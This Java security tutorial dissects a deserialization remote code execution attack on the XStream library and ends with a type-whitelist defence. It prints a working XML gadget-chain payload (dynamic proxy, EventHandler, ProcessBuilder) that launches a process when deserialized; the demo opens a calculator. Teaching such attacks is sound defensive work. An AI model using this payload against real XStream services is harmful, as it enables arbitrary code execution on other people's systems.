1. Overview

In this tutorial, we’ll dissect a Remote Code Execution attack against the XStream XML serialization library. This exploit falls into the untrusted deserialization category of attacks.

We’ll learn when XStream is vulnerable to this attack, how the attack works, and how to prevent such attacks.

2. XStream Basics

Before describing the attack, let’s review some XStream basics. XStream is an XML serialization library that translates between Java types and XML. Consider a simple Person class:

public class Person {
    private String first;
    private String last;

    // standard getters and setters
}

Let’s see how XStream can write some Person instance to XML:

XStream xstream = new XStream();
String xml = xstream.toXML(person);

Likewise, XStream can read XML into an instance of Person:

XStream xstream = new XStream();
xstream.alias("person", Person.class);
String xml = "<person><first>John</first><last>Smith</last></person>";
Person person = (Person) xstream.fromXML(xml);

In both cases, XStream uses Java reflection to translate the Person type to and from XML. The attack takes place while XStream reads XML, because that is when it instantiates Java classes using reflection.

The classes XStream instantiates are determined by the names of the XML elements it parses.

Because we configured XStream to be aware of the Person type, XStream instantiates a new Person when it parses XML elements named “person”.
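To make the idea concrete, here is a deliberately simplified sketch of name-based instantiation. It is not XStream's actual implementation; the ElementNameResolver class, its methods, and the nested Person stand-in are hypothetical names used only for illustration. It assumes that an element name without a registered alias is treated as a fully qualified class name:

```java
import java.util.HashMap;
import java.util.Map;

// Simplified illustration only; this is not how XStream is implemented.
class ElementNameResolver {

    // Hypothetical stand-in for the tutorial's Person class.
    static class Person {
        String first;
        String last;
    }

    private final Map<String, Class<?>> aliases = new HashMap<>();

    void alias(String elementName, Class<?> type) {
        aliases.put(elementName, type);
    }

    // Turns an XML element name into a new object via reflection.
    Object instantiate(String elementName) {
        try {
            Class<?> type = aliases.get(elementName);
            if (type == null) {
                // No alias registered: treat the element name as a class name.
                // This is the step that lets the XML author choose the class.
                type = Class.forName(elementName);
            }
            return type.getDeclaredConstructor().newInstance();
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("Cannot instantiate " + elementName, e);
        }
    }

    public static void main(String[] args) {
        ElementNameResolver resolver = new ElementNameResolver();
        resolver.alias("person", Person.class);

        // An aliased name and an arbitrary class name are both instantiated.
        System.out.println(resolver.instantiate("person").getClass().getSimpleName());
        System.out.println(resolver.instantiate("java.util.TreeSet").getClass().getName());
    }
}
```

The second call is the interesting one: whoever writes the XML, not the developer, decides which class gets created.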

In addition to user-defined types like Person, XStream recognizes core Java types out of the box. For example, XStream can read a Map from XML:

String xml = "" 
    + "<map>" 
    + "  <element>" 
    + "    <string>foo</string>" 
    + "    <int>10</int>" 
    + "  </element>" 
    + "</map>";
XStream xStream = new XStream();
Map<String, Integer> map = (Map<String, Integer>) xStream.fromXML(xml);

We’ll see how XStream’s ability to read XML representing core Java types will be helpful in the remote code execution exploit.

3. How the Attack Works

Remote code execution attacks occur when attackers provide input which is ultimately interpreted as code. In this case, attackers exploit XStream’s deserialization strategy by providing attack code as XML.

With the right composition of classes, XStream ultimately runs the attack code through Java reflection.

Let’s build an example attack.

3.1. Include Attack Code in a ProcessBuilder

Our attack aims to start a new desktop calculator process. On macOS, this is “/Applications/Calculator.app”. On Windows, this is “calc.exe”. To start it, we’ll trick XStream into running a new process using a ProcessBuilder. Recall the Java code to start a new process:

new ProcessBuilder().command("executable-name-here").start();

When reading XML, XStream only invokes constructors and sets fields. Therefore, the attacker does not have a straightforward way to invoke the ProcessBuilder.start() method.
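As a small illustration of why construction alone is harmless, the sketch below configures a ProcessBuilder but never calls start(). The class name InertProcessBuilder is our own, and the command is the same placeholder used above:

```java
import java.util.List;

class InertProcessBuilder {

    // Configures a ProcessBuilder without starting it; no process is launched.
    static List<String> configuredCommand() {
        ProcessBuilder builder = new ProcessBuilder().command("executable-name-here");
        return builder.command();
    }

    public static void main(String[] args) {
        // Prints the stored command; nothing has been executed at this point.
        System.out.println(configuredCommand());
    }
}
```

Until something calls start(), the ProcessBuilder is just an object holding a list of strings.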

However, clever attackers can use the right composition of classes to ultimately execute the ProcessBuilder’s start() method.

Security researcher Dinis Cruz shows us in their blog post how they use the Comparable interface to invoke the attack code in the copy constructor of the sorted collection TreeSet. We’ll summarize the approach here.

3.2. Create a Comparable Dynamic Proxy

Recall that the attacker needs to create a ProcessBuilder and invoke its start() method. In order to do so, we’ll create an instance of Comparable whose compareTo method invokes the ProcessBuilder’s start() method.

Fortunately, Java Dynamic Proxies allow us to create an instance of Comparable dynamically.

Furthermore, Java’s EventHandler class provides the attacker with a configurable InvocationHandler implementation. The attacker configures the EventHandler to invoke the ProcessBuilder’s start() method.

Putting these components together, we have an XStream XML representation for the Comparable proxy:

<dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>open</string>
                <string>/Applications/Calculator.app</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>
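For intuition, the object graph this XML describes can be sketched in plain Java. The sketch assumes a harmless stand-in target, an AtomicInteger with its incrementAndGet method, instead of a ProcessBuilder with start(). The class name ComparableProxyDemo and the helper proxyFor are ours and are not part of XStream:

```java
import java.beans.EventHandler;
import java.lang.reflect.Proxy;
import java.util.concurrent.atomic.AtomicInteger;

class ComparableProxyDemo {

    // Builds a Comparable proxy that forwards interface calls to target.action().
    @SuppressWarnings("unchecked")
    static Comparable<Object> proxyFor(Object target, String action) {
        // Same shape as the <handler> element: a target plus an action name.
        EventHandler handler = new EventHandler(target, action, null, null);
        return (Comparable<Object>) Proxy.newProxyInstance(
            ComparableProxyDemo.class.getClassLoader(),
            new Class<?>[] { Comparable.class },
            handler);
    }

    public static void main(String[] args) {
        // Harmless stand-in for ProcessBuilder: a counter instead of a process.
        AtomicInteger calls = new AtomicInteger();
        Comparable<Object> proxy = proxyFor(calls, "incrementAndGet");

        proxy.compareTo("foo"); // delegated to calls.incrementAndGet()
        System.out.println("target method invoked " + calls.get() + " time(s)");
    }
}
```

The stand-in method returns an int, so compareTo completes normally here. The proxy itself does not care what the action does; it calls whichever no-argument method the handler was configured with.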

3.3. Force a Comparison Using the Comparable Dynamic Proxy

To force a comparison with our Comparable proxy, we’ll build a sorted collection. Let’s build a TreeSet collection that compares two Comparable instances: a String and our proxy.

We’ll use TreeSet’s copy constructor to build this collection. Finally, we have the XStream XML representation for a new TreeSet containing our proxy and a String:

<sorted-set>
    <string>foo</string>
    <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
                <command>
                    <string>open</string>
                    <string>/Applications/Calculator.app</string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </dynamic-proxy>
</sorted-set>

Ultimately, the attack occurs when XStream reads this XML. While the developer expects XStream to read a Person, it instead executes the attack:

String sortedSetAttack = // XML from above
XStream xstream = new XStream();
Person person = (Person) xstream.fromXML(sortedSetAttack);

3.4. Attack Summary

Let’s summarize the reflective calls that XStream makes when it deserializes this XML:

  1. XStream invokes the TreeSet copy constructor with a Collection containing a String “foo” and our Comparable proxy.
  2. The TreeSet constructor calls our Comparable proxy’s compareTo method in order to determine the order of the items in the sorted set.
  3. Our Comparable dynamic proxy delegates all method calls to the EventHandler.
  4. The EventHandler is configured to invoke the start() method of the ProcessBuilder it composes.
  5. The ProcessBuilder forks a new process running the command the attacker wishes to execute.
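The chain summarized above can be reproduced without XStream. The following sketch builds the same graph by hand, again assuming a harmless AtomicInteger target in place of the ProcessBuilder. SortedSetTriggerDemo and buildSetAndCountInvocations are hypothetical names chosen for this example:

```java
import java.beans.EventHandler;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.TreeSet;
import java.util.concurrent.atomic.AtomicInteger;

class SortedSetTriggerDemo {

    // Builds the same graph as the <sorted-set> XML, with a counter as target.
    static int buildSetAndCountInvocations() {
        AtomicInteger calls = new AtomicInteger(); // stand-in for ProcessBuilder
        EventHandler handler = new EventHandler(calls, "incrementAndGet", null, null);
        Object proxy = Proxy.newProxyInstance(
            SortedSetTriggerDemo.class.getClassLoader(),
            new Class<?>[] { Comparable.class },
            handler);

        // We never call a method on the proxy ourselves. TreeSet compares the
        // elements while inserting them, and that comparison reaches the handler.
        new TreeSet<Object>(Arrays.asList("foo", proxy));
        return calls.get();
    }

    public static void main(String[] args) {
        System.out.println("invocations: " + buildSetAndCountInvocations());
    }
}
```

Merely constructing the sorted set is enough to run the configured method, which is why deserializing the XML triggers the attack before the cast to Person is ever reached.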

4. When Is XStream Vulnerable?

XStream can be vulnerable to this remote code execution attack when the attacker controls the XML it reads.

For instance, consider a REST API that accepts XML input. If this REST API uses XStream to read XML request bodies, then it may be vulnerable to a remote code execution attack because attackers control the content of the XML sent to the API.

On the other hand, an application that only uses XStream to read trusted XML has a much smaller attack surface.

For example, consider an application that only uses XStream to read XML configuration files set by an application administrator. This application is far less exposed to XStream remote code execution because attackers do not control the XML the application reads (the admin does).

5. Hardening XStream Against Remote Code Execution Attacks

Fortunately, XStream introduced a security framework in version 1.4.7. We can use the security framework to harden our example against remote code execution attacks. The security framework allows us to configure XStream with a whitelist of types it is allowed to instantiate.

This list will only include basic types and our Person class:

XStream xstream = new XStream();
xstream.addPermission(NoTypePermission.NONE);
xstream.addPermission(NullPermission.NULL);
xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
xstream.allowTypes(new Class<?>[] { Person.class });
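Conceptually, a type whitelist rejects a type name before it is ever turned into a class. The sketch below shows that idea in plain Java; it is not XStream's implementation. AllowlistResolver is a hypothetical class, and SecurityException is only a stand-in for whatever error the library reports:

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

// Illustrative sketch of a type whitelist; not part of XStream.
class AllowlistResolver {

    private final Set<String> allowedTypeNames;

    AllowlistResolver(Set<String> allowedTypeNames) {
        this.allowedTypeNames = allowedTypeNames;
    }

    // Resolves a type name only if it was explicitly permitted.
    Class<?> resolve(String typeName) {
        if (!allowedTypeNames.contains(typeName)) {
            // Rejected before any class is loaded or instantiated.
            throw new SecurityException("Type not allowed: " + typeName);
        }
        try {
            return Class.forName(typeName);
        } catch (ClassNotFoundException e) {
            throw new IllegalArgumentException("Unknown type: " + typeName, e);
        }
    }

    public static void main(String[] args) {
        AllowlistResolver resolver =
            new AllowlistResolver(new HashSet<>(Arrays.asList("java.lang.String")));

        System.out.println(resolver.resolve("java.lang.String"));
        try {
            resolver.resolve("java.lang.ProcessBuilder");
        } catch (SecurityException e) {
            System.out.println(e.getMessage());
        }
    }
}
```

With such a check in place, the types used by the attack XML (the dynamic proxy, EventHandler, and ProcessBuilder) would be refused because none of them is on the list.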

Additionally, XStream users may consider hardening their systems using a Runtime Application Self-Protection (RASP) agent. RASP agents use bytecode instrumentation at run time to automatically detect and block attacks. This technique can be less error-prone than manually building a whitelist of types.

6. Conclusion

In this article, we learned how to perform a remote code execution attack on an application that uses XStream to read XML. Because attacks like this exist, XStream must be hardened when it is used to read XML from untrusted sources.

The exploit exists because XStream uses reflection to instantiate Java classes identified by the attacker’s XML.

As always, the code for the examples can be found over on GitHub.